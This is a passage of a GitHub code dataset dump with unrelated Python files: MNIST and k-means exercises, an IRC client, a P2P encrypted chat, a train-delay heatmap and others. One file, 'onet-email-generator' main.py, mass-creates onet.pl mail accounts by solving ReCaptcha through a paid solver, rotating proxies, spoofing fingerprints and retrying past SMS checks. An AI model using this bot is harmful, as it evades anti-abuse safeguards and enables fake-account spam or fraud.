0.2*1e-3*np.ones((T,NRep))\n event_time[1,:] = 1e-3\n event_time[-2,:] = 1e-3\n\nall_flips = np.zeros((NIter,T,NRep,2))\nall_event_times = np.zeros((NIter,T,NRep))\nall_grad_moms = np.zeros((NIter,T,NRep,2))\nall_reco_images = np.zeros((NIter,sz,sz,2))\n\nfor ni in range(NIter):\n all_flips[ni] = b[0][ni]['flips_angles']\n all_event_times[ni] = event_time\n all_grad_moms[ni] = b[0][ni]['grad_moms']\n all_reco_images[ni] = b[0][ni]['reco_image'].reshape([sz,sz,2])\n \n\nscanner_dict = dict()\nscanner_dict['flips'] = all_flips\nscanner_dict['event_times'] = all_event_times\nscanner_dict['grad_moms'] = all_grad_moms\nscanner_dict['reco_images'] = all_reco_images\nscanner_dict['sz'] = np.array([sz,sz])\nscanner_dict['T'] = T\nscanner_dict['NRep'] = NRep\n\npath=os.path.join('../out/',experiment_id)\ntry:\n os.mkdir(path)\nexcept:\n print('export_to_matlab: directory already exists')\n \nscipy.io.savemat(os.path.join(path,\"all_iter.mat\"), scanner_dict)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"skye789/MRI-Sequence-Programming","sub_path":"MRTwin_pulseq-exercise/code/MRtwin/auxutil/au02_seq_history_matlab_convert.py","file_name":"au02_seq_history_matlab_convert.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25219843515","text":"from PIL import Image\nimport torchvision\nimport torch\nimport torch.nn.functional as F\n\ntorch.set_printoptions(precision=0, linewidth=160)\n\n# Approach 2: Cheat\n# Copying the methodology from the fast.ai book:\n# Averaging over the training dataset to get the Platonic digits, instead of hand-defining them\n\n\n# get dataset\nmnist = torchvision.datasets.MNIST(\"data\", download=True)\n\n\ndef to_img(t):\n \"\"\"Converts a pytorch tensor into an image\"\"\"\n return torchvision.transforms.ToPILImage()(t)\n\n\n# get tensors from dataset for a particular digit #\ndef get_n_tensors(n):\n return [mnist.data[i] for i in range(len(mnist.data)) if mnist.targets[i] == torch.tensor(n)]\n\n\ndef make_average(t): return (torch.stack(t).float() / 255).mean(0)\n\n\nplatonic_digits = [make_average(get_n_tensors(n)) for n in range(10)]\n\n# How to show an img:\n# to_img(t).show()\n\n# stacked_twos = make_average(get_n_tensors(2))\n# to_img(stacked_twos).show()\n\ndef predict(img_tensor):\n \"\"\"Predicts which digit the image represents\"\"\"\n scores = [F.l1_loss(digit, img_tensor) for digit in platonic_digits]\n\n lowest = 0\n lowest_score = float(\"inf\")\n for i, s in enumerate(scores):\n if s < lowest_score:\n lowest = i\n lowest_score = s\n return lowest\n\n\ndef get_results():\n correct = 0\n dataset_length = len(mnist.data)\n for i in range(dataset_length):\n img = mnist.data[i]\n result = mnist.targets[i]\n\n # img = mnist.data[i]\n # result = mnist.targets[i]\n prediction = predict(img)\n\n if prediction == result:\n correct += 1\n\n return correct / dataset_length\n\n\nprint(get_results())\n","repo_name":"mulholo/mnist","sub_path":"02_identify_cheat.py","file_name":"02_identify_cheat.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23441546385","text":"#!/usr/bin/env python\nimport numpy as np\nimport scipy\nimport scipy.linalg as la\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n#from mnist import MNIST\nimport pickle\nimport os\nsns.set()\nsns.set_style(\"ticks\")\nnp.random.seed(1)\nprint(\"modules loaded\")\n\n\n\ndef load_data():\n\tsavedf = \"data.pkl\"\n\tif(os.path.exists(savedf)):\n\t\tprint(\"Reading: \" + savedf)\n\t\twith open(savedf, 'rb') as input:\n\t\t\tX_train = pickle.load(input)\n\t\t\tlabels_train = pickle.load(input)\n\t\t\tX_test = pickle.load(input)\n\t\t\tlabels_test = pickle.load(input)\n\telse:\n\t\tmndata = MNIST('python-mnist/data/')\n\t\tX_train, labels_train = map(np.array, mndata.load_training())\n\t\tX_test, labels_test = map(np.array, mndata.load_testing())\n\t\tX_train = X_train/255.0\n\t\tX_test = X_test/255.0\n\t\twith open(savedf, 'wb') as output:\n\t\t\tpickle.dump(X_train, output, pickle.HIGHEST_PROTOCOL)\n\t\t\tpickle.dump(labels_train, output, pickle.HIGHEST_PROTOCOL)\n\t\t\tpickle.dump(X_test, output, pickle.HIGHEST_PROTOCOL)\n\t\t\tpickle.dump(labels_test, output, pickle.HIGHEST_PROTOCOL)\n\t\n\tX = np.concatenate((X_test, X_train))\n\ty = np.concatenate((labels_test, labels_train))\n\tprint(X.shape, y.shape)\n\treturn(X, y)\n\n\ndef objfun(alldists, clusters, k):\n\tobj = 0\n\tfor i in range(k):\n\t\tidxs = (clusters == i)\n\t\tcut = alldists[idxs,i]\n\t\tobj += np.sum(np.square(cut))\n\treturn(obj)\n\ndef dists(X, cent):\n\tdist = np.linalg.norm(X-cent, axis=1, ord=2)\n\treturn(dist)\n\ndef distMat(X, cents):\n\tn = X.shape[0]\n\tk = cents.shape[0]\n\talldists = np.zeros((n,k))\n\tfor i in range(k):\n\t\t#print(i, k)\n\t\talldists[:, i] = dists(X, cents[i, :])\t\n\treturn(alldists)\n\ndef DxProb(alldists):\n\trtn = np.square( np.min(alldists, axis=1) )\n\trtn2 = rtn / np.sum(rtn)\n\tprint(rtn2.shape)\n\treturn(rtn2)\n\ndef findCluster(X, cents):\n\tk = cents.shape[0]\n\talldists = distMat(X, cents)\n\tclusters = np.argmin(alldists, axis=1)\n\treturn(clusters, alldists)\n\ndef getCents(X, clusters, k):\n\tcents = np.zeros((k, X.shape[1]))\n\tfor i in range(k):\n\t\t#print(clusters, i)\n\t\tidxs = (clusters == i)\n\t\t#print(\"idxs\", idxs)\n\t\tcut = X[idxs,:]\n\t\t#print(cut)\n\t\tcents[i,:] = np.mean(cut, axis=0)\t\n\treturn(cents)\n\ndef isDone(old, new):\n\tn = old.shape[0]\n\tsame = np.sum(old==new)\n\treturn(same == n)\n\ndef kppStart(X, k):\n\tn = X.shape[0]\n\ttmp = np.arange(n)\n\tselidx = np.random.choice(tmp, size=1, replace=False)\n\tcents = X[selidx, :]\n\t# add aditional centers\n\tfor i in range(k-1):\n\t\talldists = distMat(X, cents)\n\t\tprobs = DxProb(alldists)\n\t\tj = 0 \n\t\twhile(True):\n\t\t\trandint = np.random.randint(0, n)\n\t\t\tthresh = np.random.uniform()\n\t\t\tval = probs[randint]\n\t\t\tif( val > thresh ):\n\t\t\t\tnewcent = X[randint, :].reshape(1,X.shape[1])\n\t\t\t\t#print(val, thresh, j, newcent.shape)\n\t\t\t\tcents = np.concatenate((cents, newcent))\n\t\t\t\tbreak\t\t\t\n\t\t\tj += 1\n\tprint(cents.shape)\n\treturn(cents)\n\ndef selStart(X, k):\n\tn = X.shape[0]\n\ttmp = np.arange(n)\n\tselidx = np.random.choice(tmp, size=k, replace=False)\n\t#print(selidx)\n\treturn(X[selidx,:])\n\ndef myplot(cents, name, objs):\n\tk = cents.shape[0]\n\t\n\t#obective fucntion\n\tfig = plt.figure()\n\tsns.lineplot(np.arange(len(objs)), objs, markers=True, style=1)\t\n\tplt.xlabel(\"Iteration\")\n\tplt.ylabel(\"Objective\")\n\tout = name + \".obj.\" + str(k) + \".pdf\"\n\tfig.suptitle(out)\n\tplt.savefig(out)\n\n\t# vizualization\n\tt = int(np.ceil(k/5))\n\tfig, axs = plt.subplots(ncols = 5, nrows = t, figsize=(5*2, t*2))\n\n\tfor i in range(k):\n\t\tax = axs.flat[i]\n\t\tax.set_aspect(\"equal\")\n\t\tax.get_xaxis().set_visible(False)\n\t\tax.get_yaxis().set_visible(False)\n\t\tdata = cents[i, :].reshape((28,28))\n\t\tsns.heatmap(data, ax = ax, cbar=False)\n\tout = name + \".heat.\" + str(k) + \".pdf\"\n\n\tsns.despine(fig, left=True, bottom=True)\n\tfig.suptitle(out)\n\tplt.savefig(out)\n\t\ndef runlloyd(X, cents, name = \"random\"):\n\tk = cents.shape[0]\n\tobjs = []\n\tclusters, alldists = findCluster(X, cents)\n\tobj = objfun(alldists, clusters, k)\n\tobjs.append(obj)\n\n\twhile(True):\n\t\tcents = getCents(X, clusters, k)\n\t\tnewclusters, alldists = findCluster(X, cents)\n\t\tnewobj = objfun(alldists, newclusters, k)\n\t\tobjs.append(newobj)\n\t\tprint(newobj, newobj < obj)\n\t\tif(newobj >= obj):\n\t\t\tbreak\n\t\telse:\n\t\t\tobj = newobj\n\t\t\tclusters = newclusters\n\tmyplot(cents, name, objs)\n\treturn(clusters, cents)\n\t\n#\n# load / save\n#\nX, y = load_data()\n#X = X[np.random.randint(1, X.shape[0], size=1000), :]\n\nfor k in [5, 10, 20]:\n\tprint(\"rand\")\n\tcents = selStart(X, k=k)\n\tprint(cents.shape)\n\trunlloyd(X, cents)\n\tprint(\"kpp\")\n\tcents = kppStart(X, k=k)\n\trunlloyd(X, cents, name=\"kpp\")\n\n\n","repo_name":"mrvollger/CSE546","sub_path":"hw3/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28007116430","text":"'''Author: Eric Adjei Appiah\nCS 151 Section: B\nFall 2022\nDate: 10th November, 2022\n'''\n\nfrom lab07 import *\nimport turtle as trt\n\ndef main():\n '''Reads the alice text file and converts it into a drawn braille'''\n file = open('alice.txt','r')\n lines = file.readlines()\n for line in lines:\n line = line.strip()\n bs=translator(line,braille_dictionary)\n draw_word(trt, bs)\n file.close()\nmain()\n","repo_name":"heyerichere/Braille","sub_path":"extension2.py","file_name":"extension2.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8746280742","text":"import socket\nimport time\nimport re\n\nclass Client:\n \"\"\"Class IRC client\"\"\"\n def __init__(self, addr=str, port=int, nickname=\"Guest\", fullname=\"John Doe\", password=\"\"):\n \"\"\"Constructor. Setup the socket.\"\"\"\n self.addr = addr\n self.port = port\n self.nickname = nickname\n self.fullname = fullname\n self.password = password\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.connected = False\n self.logged = False\n\n def ask_config(self):\n \"\"\"Ask the mandatory options to the user\"\"\"\n\n next_step = False\n while next_step is False:\n self.addr = input(\"Ip address: \")\n if self.addr == \"\":\n print(\"Please write something.\")\n else:\n next_step = True\n\n next_step = False\n while next_step is False:\n tmp = input(\"Port (6667): \")\n if tmp == \"\":\n next_step = True\n elif type(tmp) is int or (type(tmp) is str and tmp.isdigit() is True):\n self.port = int(tmp)\n next_step = True\n else:\n print(\"Please enter a valid port.\")\n\n next_step = False\n while next_step is False:\n tmp = input(\"Nickname (\\\"Guest\\\"): \")\n if tmp == \"\":\n next_step = True\n elif len(tmp) <= 31:\n next_step = True\n self.nickname = tmp\n else:\n print(\"Invalid nickname (over 31 characters).\")\n \n next_step = False\n while next_step is False:\n tmp = input(\"Real Name (\\\"John Doe\\\"): \")\n if tmp == \"\":\n next_step = True\n elif len(tmp) <= 31:\n next_step = True\n self.nickname = tmp\n \n self.password = input(\"Password (press enter if empty): \")\n\n\n def connect(self):\n \"\"\"Connect the user into the IRC server\"\"\"\n if self.addr is None or self.addr == \"\":\n print(\"No ip address given.\")\n return\n self.socket.connect((self.addr, self.port))\n self.connected = True\n self.socket.setblocking(True)\n print(\"Connected to \" + self.addr + \":{}\".format(self.port))\n\n def login(self):\n self.send_command(\"NICK \" + self.nickname)\n self.send_command(\"USER \" + self.nickname + \" \" + self.nickname + \" \" + self.nickname + \" :\" + self.fullname)\n if self.password != \"\":\n self.send_command(\"PASS \" + self.password)\n self.logged = True\n\n def get_response(self):\n return self.socket.recv(8192)\n\n def disconnect(self):\n \"\"\"Disconnect the user from the IRC server\"\"\"\n print(\"Disconnecting from the server...\")\n self.send_command(\"QUIT :Bye\")\n self.connected = False\n\n def send_to(self, user, text):\n self.send_command(\"PRIVMSG \" + user + \":\" + text)\n\n def join(self, channel):\n self.send_command(\"JOIN \" + channel)\n\n def send_command(self, cmd=str):\n \"\"\"Send a command to the IRC server and wait for the response\"\"\"\n self.socket.send((cmd + \"\\r\\n\").encode())\n\n def ping_handler(self):\n data = self.get_response()\n if data.find(b\"PING\") != -1:\n pong = data.decode().split(':')[1]\n self.socket.send(pong.encode())\n return \"PING\"\n else:\n return data.decode()\n\n def is_disconnected(self, data=bytes):\n clearedData = data.decode().split(\"\\n\")\n clearedData = clearedData[len(clearedData) - 2]\n if clearedData.startswith('ERROR :Closing link:') is True:\n self.connected = False\n return True\n else:\n return False\n \n def message_handling(self, msg):\n msg_array = msg.split(\"\\r\\n\")\n for line in msg_array:\n print(line)\n if re.search(r\" [4-5][0-9]{2} \\* \" + self.nickname, line):\n return False\n return True\n\n def __del__(self):\n if self.socket is not None:\n self.socket.close()","repo_name":"nathantouze/IRC_client-CLI-","sub_path":"irc.py","file_name":"irc.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73804428324","text":"import collections\nimport heapq\n\n\ndef reorganizeString(s):\n if not s:\n return ''\n heap, last, ans = [], None, ''\n counts = collections.Counter(s)\n for ch in counts:\n heapq.heappush(heap, (-counts[ch], ch))\n\n while heap:\n count, ch = heapq.heappop(heap)\n ans += ch\n if last:\n heapq.heappush(heap, last)\n last = (count + 1, ch) if count != -1 else None\n\n return ans if not last else ''\n\ns = 'aaabab'\nprint(reorganizeString(s))","repo_name":"tanjingjing123/LeetcodeAlgorithms","sub_path":"reorganizeString.py","file_name":"reorganizeString.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18374995860","text":"a=int(input(\"共T筆測試資料(1<=T<=20):\"))\r\n\r\nfor m in range(a):\r\n b=[]\r\n a=0\r\n for j in range(0,4):\r\n b.append(int(input()))\r\n if b[1]-b[0]==b[2]-b[1]==b[3]-b[2]:\r\n b.append(b[3]+b[3]-b[2])\r\n for m in range(len(b)):\r\n print(\"%d\"%(b[m]),end=\" \")\r\n print(\"\\n此為等差數列\")\r\n elif b[1]/b[0]==b[2]/b[1]==b[3]/b[2]:\r\n b.append(b[3]*b[2]/b[1])\r\n for m in range(len(b)):\r\n print(\"%d\"%(b[m]),end=\" \")\r\n print(\"\\n此為等比數列\")\r\n else:\r\n print('這不是數列')","repo_name":"yao092/exercise","sub_path":"36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24098178075","text":"import socket\nimport threading\nimport rsa\nfrom Cryptodome.Random import get_random_bytes\n\nclass Chat:\n def __init__(self,rcv,enc):\n self.rcv = rcv\n self.enc = enc\n self.my_sock= None\n self.set_status = None\n self.set_peer_ip = None\n self.set_port = None\n self.target_ip =None\n\n def start_chat_await(self):\n listen_ip = '0.0.0.0'\n listen_port = 888 # int(input('Enter listening port: '))\n self.set_port(str(listen_port))\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind((listen_ip, listen_port))\n self.my_sock = sock\n await_thread = threading.Thread(target=self.await_connection)\n await_thread.start()\n\n def await_connection(self):\n self.my_sock.listen(1)\n print('Waiting for incoming connection...')\n self.set_status(\"Awaiting\")\n self.start_chat()\n\n def start_chat(self):\n sending_sock, client_addr = self.my_sock.accept()\n self.rcv.sending_soc = sending_sock\n print('Connected to peer:', client_addr[0])\n\n self.set_peer_ip(str(client_addr[0]))\n\n aes_key = get_random_bytes(16)\n self.rcv.aes_key = aes_key\n\n while True:\n data = sending_sock.recv(1024).decode('utf-8')\n if data.startswith('KEY'):\n self.rcv.receive_public_key(data)\n break\n\n n, e = str(self.rcv.peer_key).split(\",\")\n encrypted_key = self.enc.encrypt_message(aes_key, rsa.PublicKey(int(n), int(e)))\n self.enc.send_aes_key(sending_sock, encrypted_key)\n\n self.set_status(\"Connected\")\n\n receive_thread = threading.Thread(target=self.rcv.receive_messages)\n receive_thread.start()\n\n def start_chat_connect(self):\n\n target_port = 888\n if self.target_ip is None:\n return\n\n sending_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sending_sock.connect((self.target_ip, target_port))\n except:\n self.set_status(\"Wrong IP\")\n return\n\n self.rcv.sending_soc = sending_sock\n print('Connected to peer')\n\n\n\n self.enc.send_public_key(sending_sock)\n while True:\n data = sending_sock.recv(1024)\n self.rcv.receive_aes_key(data)\n break\n\n self.set_status(\"Connected\")\n self.set_peer_ip(str(self.target_ip))\n self.set_port(str(target_port))\n\n receive_thread = threading.Thread(target=self.rcv.receive_messages)\n receive_thread.start()\n\n\n\n","repo_name":"Nemezjusz/Chat-P2P","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13778571340","text":"import csv\nimport json\nimport random\nimport sys\nimport time\n\nimport capsolver\nimport requests\n\nfrom utils.logger import CustomLogger\nfrom utils.save_to_csv import save_success_data\nfrom utils.webhooks import Webhook\n\nlog = CustomLogger(__name__)\n\n\nclass Account:\n proxy = []\n fingerprint = [\"5f365f6da776a4ebdb2c5f8ea8d1a68d\", \"1b7e1b5a9cd9931c61c028b2de59b10f\",\n \"a11a1b233f8a6e9f71c93c7521a329ab\", \"c3b47470daa0c9a7394824ea12cfd5d1\",\n \"899b821f0a8cd6dbb8b43f671df5d781\", \"3d8783156630ccfe0cc7e599e5e0475c\",\n \"bddc398d5d34994d2e8e6b5083ea8da6\", \"19a7e8985c44b8ee2dca970fc8520122\",\n \"e1ca82b3e8efc26f6f846d7082c8d9bc\", \"77b554de4407974ba69e1f6775b416b7\",\n \"fac8cb2ad4ce55760dc41a9301f47f7b\", \"0418201bb96e8b6efc2446ba6dd5fe6b\"]\n\n def __init__(self, data):\n self.data = data\n self.session = requests.Session()\n self.mail = f\"{self.data['login']}@{self.data['domain']}\"\n\n @classmethod\n def proxy_format(cls):\n try:\n with open(\"proxies.txt\", \"r\") as file:\n proxy_lines = (line.strip().split(\":\") for line in file)\n cls.proxy.extend([f\"http://{octet[2]}:{octet[3]}@{octet[0]}:{octet[1]}\" for octet in proxy_lines])\n\n if not cls.proxy:\n raise ValueError(\"Fill proxies.txt file\")\n\n except ValueError as e:\n log.error(e)\n sys.exit()\n except Exception as e:\n log.error(e)\n sys.exit()\n\n @classmethod\n def get_capsvoler_key(cls):\n try:\n with open(\"key.json\", \"r\") as file:\n data = json.load(file)\n\n if not data['key']:\n log.error(\"Add capsolver key in key.json\")\n sys.exit()\n capsolver.api_key = data['key']\n except Exception as e:\n log.error(e)\n sys.exit()\n\n @staticmethod\n def generate_date():\n return f\"{random.choice(range(1990, 2003))}-{str(random.choice(range(1, 13))).zfill(2)}-{str(random.choice(range(1, 30))).zfill(2)}\"\n\n def first_payload(self):\n try:\n log.debug(f\"[{self.mail}]Solving ReCaptcha...\")\n\n self.solution = capsolver.solve({\n \"type\": \"ReCaptchaV3Task\",\n \"pageAction\": \"checkRegisterEmailIdentity\",\n \"websiteKey\": \"6LcdGIQlAAAAAHWCwQXSx1-Voi9npxOU9zNiwGdz\",\n \"websiteURL\": \"https://konto.onet.pl/register?state=https%3A%2F%2Fpoczta.onet.pl%2F&client_id=poczta.onet.pl.front.onetapi.pl\",\n \"proxy\": random.choice(Account.proxy)\n })\n\n log.debug(f\"[{self.mail}]Submitting payload...\")\n\n req = self.session.post(\n \"https://konto.onet.pl/newapi/oauth/check-register-email-identity\",\n headers={\n \"content-type\": \"application/json\",\n \"referer\": \"https://konto.onet.pl/\",\n \"user-agent\": self.solution['userAgent']\n },\n data=json.dumps({\n \"state\": \"https://poczta.onet.pl/\",\n \"login\": self.data['login'],\n \"domain\": self.data['domain'],\n \"captcha_response\": self.solution['gRecaptchaResponse'],\n }),\n proxies={\n \"https\": random.choice(Account.proxy)\n },\n timeout=7)\n\n if req.ok:\n try:\n if req.json()['verificationType'] == 'CAPTCHA':\n time.sleep(1)\n self.second_payload()\n elif req.json()['verificationType'] == 'SMS':\n log.critical(f\"[{self.mail}]Account requires phone number verification, retrying in 10 seconds...\")\n time.sleep(10)\n return self.first_payload()\n except Exception as e:\n log.error(f\"[{self.mail}]Unknown error [{req.status_code} | {e}]\")\n time.sleep(5)\n return self.first_payload()\n except requests.exceptions.ProxyError:\n log.error(f\"[{self.mail}]Proxy Error, retrying in 5 seconds...\")\n time.sleep(5)\n return self.first_payload()\n except requests.exceptions.Timeout:\n log.error(f\"[{self.mail}]Timeout, retrying in 5 seconds...\")\n time.sleep(5)\n return self.first_payload()\n\n def second_payload(self):\n try:\n log.debug(f\"[{self.mail}]Creating account...\")\n\n req = self.session.post(\n \"https://konto.onet.pl/newapi/oauth/email-user\",\n headers={\n \"content-type\": \"application/json\",\n \"referer\": \"https://konto.onet.pl/\",\n \"user-agent\": self.solution['userAgent']\n },\n data=json.dumps({\n \"login\": self.data['login'],\n \"domain\": self.data['domain'],\n \"password\": self.data['password'],\n \"name\": self.data['firstname'],\n \"surname\": self.data['lastname'],\n \"place\": None,\n \"postal_code\": None,\n \"sex\": \"M\",\n \"date_of_birth\": Account.generate_date(),\n \"agreements\": [\"6\", \"21\", \"85\"],\n \"phone\": \"\",\n \"phone_token\": None,\n \"fingerprint\": random.choice(Account.fingerprint),\n \"browser_params\": self.solution['userAgent'],\n \"guardian_email\": \"\",\n \"save_phone\": True,\n \"client_id\": \"poczta.onet.pl.front.onetapi.pl\",\n \"recoveryEmail\": self.data['recovery mail'],\n \"lang\": \"pl\",\n \"group_order\": \"\",\n \"service_with_inbox\": False\n }))\n\n if req.ok:\n if \"https://konto.onet.pl/checkSSO/auth.html?client_id=poczta.onet.pl.front.onetapi.pl&code=\" in req.json()['redirectUrl']:\n log.info(f\"[{self.mail}]Account created!\")\n save_success_data(self.data)\n Webhook.onet_success(\n self.data['webhook url'],\n f\"{self.mail}:{self.data['password']}\"\n )\n else:\n log.error(f\"[{self.mail}]Something went wrong while creating account... [{req.json()}]\")\n Webhook.onet_failed(\n self.data['webhook url'],\n f\"{self.mail}:{self.data['password']}\",\n f\"Something went wrong while creating account [{req.json()}]\"\n )\n elif req.status_code == 500:\n log.error(f\"[{self.mail}]Incorrect data in the csv file/fingerprint\")\n Webhook.onet_failed(\n self.data['webhook url'],\n f\"{self.mail}:{self.data['password']}\",\n f\"Incorrect data in the csv file/fingerprint\"\n )\n except requests.exceptions.ProxyError:\n log.error(f\"[{self.mail}]Proxy Error, retrying in 5 seconds...\")\n time.sleep(5)\n return self.second_payload()\n except requests.exceptions.Timeout:\n log.error(f\"[{self.mail}]Timeout, retrying in 5 seconds...\")\n time.sleep(5)\n return self.second_payload()\n\n\ndef run():\n Account.proxy_format()\n Account.get_capsvoler_key()\n\n with open('data/onet.csv', 'r', encoding='utf-8') as file:\n reader = csv.DictReader(file)\n lines = list(reader)\n\n\n for i in lines:\n if all(value for value in i.values()):\n task = Account(i)\n task.first_payload()\n log.warning(\"Waiting 30 seconds...\")\n time.sleep(30)\n else:\n log.error(\"Missing value(s) in csv line, skipping...\")\n time.sleep(3)\n\n print(\"\", flush=True)\n\n log.info(\"ALL TASKS HAS BEEN EXECUTED\")\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"Michal22git/onet-email-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21632989444","text":"import logging\nfrom kiteconnect import KiteConnect\nfrom configparser import ConfigParser \nfrom pprint import pprint\nimport pdb\n\n \nconfigur = ConfigParser() \nconfigur.read('config.ini')\nApi_key= configur.get('credentials','Api_key')\nApi_secret= configur.get('credentials','Api_secret')\nAccess_token= configur.get('credentials','Access_token')\nprint(Api_key)\nprint(Api_secret)\nprint(Access_token)\n\nkws = KiteTicker(Api_key, Access_token)\n\n\ndef on_ticks(ws, ticks):\n print(ticks)\n print(\"\\n\")\n # pdb.set_trace()\n\n\ndef on_connect(ws, response):\n ws.subscribe([3050241, 177665])\n ws.set_mode(ws.MODE_FULL, [3050241, 177665])\n\n\nkws.on_ticks = on_ticks\nkws.on_connect = on_connect\nkws.connect()\n","repo_name":"deva567/my_blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8963783289","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[262]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport datetime\n\nTICK_COLOURS = 'black'\n\n\n# In[263]:\n\n\n# date field was shadowing datetime.date class\ndf = pd.read_csv('delay_history.csv', \n parse_dates = ['date', 'scheduled_depart', 'scheduled_arrive', 'actual_arrive']).rename(columns={'date':'date_'})\ndf = df.assign(day_name = df.date_.dt.day_name())\nfor hhmm_col in ['scheduled_depart', 'scheduled_arrive', 'actual_arrive']:\n df[hhmm_col] = pd.to_datetime(df[hhmm_col], format = '%H:%M').dt.time\n\n\n# In[264]:\n\n\ndef plot_heatmap(from_station, time_lower, time_upper, agg_col, fmt, operator = 'LM'):\n \n metrics = {\n 'minutes_late' : 'Avg. minutes late',\n 'on_time' : 'Percentage of trains on time',\n 'cancelled' : 'Percentage of trians cancelled'\n }\n \n fig = plt.figure(figsize = (15,15))\n ax = fig.add_subplot(111)\n \n _ = sns.heatmap(df.loc[(df.operator == operator) & (df.from_station == from_station) & (df.scheduled_depart > pd.to_datetime(time_lower).time()) & (df.scheduled_depart < pd.to_datetime(time_upper).time())].pivot_table(values = agg_col,\n index = 'scheduled_depart',\n columns = 'day_name').dropna()[['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']],\n annot = True,\n cmap = 'YlOrRd',\n alpha = .5,\n fmt = fmt,\n linecolor = None,\n square = True,\n cbar = False,\n ax = ax\n )\n \n cbar = ax.figure.colorbar(ax.collections[0])\n #cbar.set_label('Avg. mins late', color = TICK_COLOURS, size = '12')\n for l in cbar.ax.yaxis.get_ticklabels():\n l.set_color(TICK_COLOURS)\n \n plt.title('Operator: {}\\nDeparting from: {}\\nMetric: {}'.format(operator, from_station, metrics[agg_col]), color = TICK_COLOURS, size = 15)\n ax.tick_params(colors = TICK_COLOURS, labelsize = 12)\n ax.set_xlabel('Day of week', color = TICK_COLOURS, size = 12)\n ax.set_ylabel('Train departure', color = TICK_COLOURS, size = 12)\n \n ax.plot()\n\n\n# In[265]:\n\n\nif __name__ == '__main__':\n plot_heatmap('HRW', '07:00', '09:30', 'minutes_late', '.1f')\n plot_heatmap('EUS', '17:00', '19:30', 'minutes_late', '.1f')\n plot_heatmap('HRW', '07:00', '09:30', 'cancelled', '.1%')\n plot_heatmap('EUS', '17:00', '19:30', 'cancelled', '.1%')\n plot_heatmap('HRW', '07:00', '09:30', 'on_time', '.1%')\n plot_heatmap('EUS', '17:00', '19:30', 'on_time', '.1%')\n\n","repo_name":"nhols/commute_delay","sub_path":"plot_heatmap.py","file_name":"plot_heatmap.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69846822565","text":"from manimlib.imports import *\n\n'''\n这个文件中的代码是manim交流群的群友提供的,实际上是由@Elteoremadebeethoven(https://github.com/Elteoremadebeethoven)编写的\nfrom @Elteoremadebeethoven(https://github.com/Elteoremadebeethoven)\n'''\n\ndef return_random_from_word(word):\n \"\"\"\n This function receives a TextMobject, \n obtains its length: \n len(TextMobject(\"Some text\"))\n and returns a random list, example:\n\n INPUT: word = TextMobjecT(\"Hello\")\n length = len(word) # 4\n rango = list(range(length)) # [0,1,2,3]\n\n OUTPUT: [3,0,2,1] # Random list\n \"\"\"\n rango = list(range(len(word)))\n random.shuffle(rango)\n return rango\n\ndef return_random_direction(word):\n \"\"\"\n This function returns a list of random UP or DOWN:\n [UP,UP,DOWN,UP,DOWN,DOWN,...]\n \"\"\"\n return [random.choice([UP,DOWN]) for _ in range(len(word))]\n\ndef get_random_coord(r_x,r_y,step_x,step_y):\n \"\"\"\n Given two ranges (a, b) and (c, d), this function returns an \n intermediate array (x, y) such that \"x\" belongs to (a, c) \n and \"y\" belongs to (b, d).\n \"\"\"\n range_x = list(range(r_x[0],r_x[1],step_x))\n range_y = list(range(r_y[0],r_y[1],step_y))\n select_x = random.choice(range_x)\n select_y = random.choice(range_y)\n return np.array([select_x,select_y,0])\n\ndef return_random_coords(word,r_x,r_y,step_x,step_y):\n \"\"\"\n This function returns a random coordinate array, \n given the length of a TextMobject\n \"\"\"\n rango = range(len(word))\n return [word.get_center() + get_random_coord(r_x,r_y,step_x,step_y) for _ in rango]\n\n\nclass WriteRandom(LaggedStart):\n CONFIG = {\n \"lag_ratio\":0.1,\n \"run_time\":2.5,\n \"anim_kwargs\":{},\n \"anim_type\":Write\n }\n def __init__(self,text,**kwargs):\n digest_config(self, kwargs)\n super().__init__(*[\n self.anim_type(text[i],**self.anim_kwargs)\n for i in return_random_from_word(text)\n ])\n\nclass UnWriteRandom(WriteRandom):\n CONFIG = {\n \"anim_kwargs\": {\n \"rate_func\": lambda t: smooth(1-t)\n },\n \"remover\": True,\n }\n\nclass FadeInRandom(WriteRandom):\n CONFIG = {\n \"anim_type\": FadeIn\n }\n\nclass FadeOutRandom(WriteRandom):\n CONFIG = {\n \"anim_type\": 